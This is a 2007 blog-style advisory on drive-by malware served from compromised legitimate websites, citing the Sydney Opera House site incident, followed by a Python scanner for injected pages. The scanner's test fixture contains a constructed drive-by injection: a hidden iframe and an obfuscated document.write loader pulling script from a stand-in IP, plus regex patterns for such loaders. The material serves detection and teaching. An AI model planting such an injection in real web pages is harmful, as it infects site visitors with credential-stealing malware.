Drive-by malware on the increase

Date: 12 November 2007

While drive-by malware attacks are not a recent phenomenon, they do appear to be on the increase, particularly in the UK. It may be just a matter of time before we see similar trends in Australia.

Drive-by malware, or drive-by downloads, are attacks in which attackers compromise legitimate web sites in order to compromise the computers of users who visit those sites in the course of their normal browsing. The compromised sites typically host various forms of identity-theft malware, designed to capture usernames and passwords, keystrokes, form data or other user input and output, and protected storage data such as passwords and digital certificate files (private keys) stored on the victim's computer, all for the purposes of identity theft and financial fraud.

UK information security sources report that drive-by malware is now a major attack vector in the UK, particularly for banking trojans, and that they are seeing fewer spam emails containing links to sites hosting malware or acting as redirectors to malware hosting sites.

Until recently, attackers relied on spam email as the major attack vector to direct victims to the web sites hosting the malware that infected their computers. Typically, attackers would either compromise a legitimate site and spam out links to it, or they would spam out links to a fraudulent web site containing the malware, most likely hosted on a fraudulent domain (or sometimes just on a bare IP address).

Google has published a detailed paper describing the increasing prevalence of legitimate sites unwittingly hosting malware after being compromised by attackers.

Without a widely distributed spam email pointing at the compromised hosts, it is now far more difficult to detect the compromised web sites that are serving malware to their visitors.

In addition, these sites create a much greater challenge for user education. While a simple mitigation against spam is to tell users "don't click on links in untrusted emails", that advice does not apply to this type of attack, because the victim is visiting a site they have every reason to trust. Instead, other aspects of user education become more important, such as running as a least-privileged user, patching software and keeping anti-virus up to date.

These types of attacks remind us that my security is only as good as the security of the networks I connect to, or, put another way, "the risks assumed by one are shared (potentially) by all". Consequently, legitimate web site owners must be mindful that their security is not just about protecting their own reputation and the sensitive data served via their web site; they also need to be mindful that the web site itself can be used as an attack vector to compromise any computer that visits it.

It is this latter point that some organisations seem to forget, or perhaps in some cases just don't understand.

If the media reporting is accurate, this appears to be the case for the relatively recent compromise of the Australian web site sydneyoperahouse.com, which was used to serve trojan malware to vulnerable computers that connected to it.

A spokesperson for the Sydney Opera House said that the incident "did not result in the disclosure of customer data", which missed the point of the attack. The attack was not meant to steal customer data held by sydneyoperahouse.com; rather, it was meant to deploy malware to steal personal information and credentials from the individuals who visited the site.

The comment also reflected a lack of concern for the potential compromise of the computers belonging to the 300,000 or so users who visit the web site each month. (As concerning was that they had no ability to detect when the site compromise occurred.)
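The two detection gaps raised above, that a compromised legitimate site is hard to spot without a spam campaign pointing at it and that the site owner could not tell when the compromise happened, are both things a site owner can address from their own side. The following is an added example, not AusCERT's code and not anything from the Sydney Opera House incident. It keeps a content hash of each served page as a baseline so that a change is noticed when it happens, and scans the served HTML for the markers typical of a drive-by injection: zero-sized or CSS-hidden iframes, scripts pulled from hosts outside the site's own allowlist, and obfuscated inline script loaders. The page contents, the allowed host names and the 203.0.113.5 address are all constructed for the example.

```python
"""Baseline-and-scan check for drive-by injections in pages a site serves.

Added example (not AusCERT's code). Two checks a site owner can run over
their own pages: a content hash baseline, so a modified page is noticed
when the change occurs, and a scan for the usual drive-by markers.
All hosts, pages and the allowlist below are constructed for the example.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts and frames from (constructed).
ALLOWED_HOSTS = {"www.example.org", "static.example.org"}

# Inline patterns typical of obfuscated drive-by loaders (constructed list).
OBFUSCATION = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(|String\.fromCharCode\s*\(|eval\s*\(\s*unescape",
    re.IGNORECASE,
)


def _hidden(attrs):
    """True if an element is rendered invisibly: CSS hidden or 0/1 px in size."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        v = (attrs.get(dim) or "").strip().rstrip("px")
        if v.isdigit() and int(v) <= 1:
            return True
    return False


def _offsite(src):
    """True if src points at a host that is not in the site's allowlist."""
    host = urlparse(src or "").hostname
    return host is not None and host not in ALLOWED_HOSTS


class InjectionScanner(HTMLParser):
    """Collects (finding_type, detail) tuples for suspicious elements."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script_buf = None  # accumulates inline script text

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src", "")
            if _hidden(a) or _offsite(src):
                self.findings.append(("hidden_or_offsite_iframe", src))
        elif tag == "script":
            src = a.get("src")
            if src and _offsite(src):
                self.findings.append(("offsite_script", src))
            self._script_buf = []

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            body = "".join(self._script_buf)
            if OBFUSCATION.search(body):
                self.findings.append(("obfuscated_inline_script", body.strip()[:60]))
            self._script_buf = None


def page_hash(html):
    """Baseline fingerprint of a page as served; store one per URL."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def scan_page(html, baseline_hash=None):
    """Return (changed, findings); changed is None when no baseline is given."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    changed = None if baseline_hash is None else page_hash(html) != baseline_hash
    return changed, scanner.findings


# Constructed pages: the site's own clean page, and the same page after a
# drive-by injection has been appended just before </body>.
CLEAN_PAGE = """<html><head><title>Box office</title>
<script src="http://static.example.org/menu.js"></script></head>
<body><h1>What's on</h1><p>Tickets.</p>
<iframe src="http://www.example.org/seatmap" width="600" height="400"></iframe>
</body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://203.0.113.5/in.cgi?3" width="0" height="0" '
    'style="visibility:hidden"></iframe>\n'
    "<script>document.write(unescape('%3Cscript src=%22http://203.0.113.5/x.js%22%3E%3C/script%3E'))</script>\n"
    "</body>",
)

if __name__ == "__main__":
    baseline = page_hash(CLEAN_PAGE)  # taken when the page was known good
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        changed, findings = scan_page(page, baseline)
        print(f"{name}: changed={changed} findings={findings}")
```

In practice the hash baseline is taken from a known-good copy and the scan is run against what the web server actually returns to an outside client, since an injection may live in a template, a database or a server module rather than in the static file on disk. The hash check answers "when did this page change"; the marker scan answers "does the change look like a drive-by", and a hit on either is reason to pull the page rather than wait for a visitor to report an infection.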

Even if the compromise is detected, getting the owner of a legitimate web site to understand that they have been compromised, and then getting them to act, is not trivial, particularly if they have no security expertise and will incur a loss from any outage required to clean the site.

Graham Ingram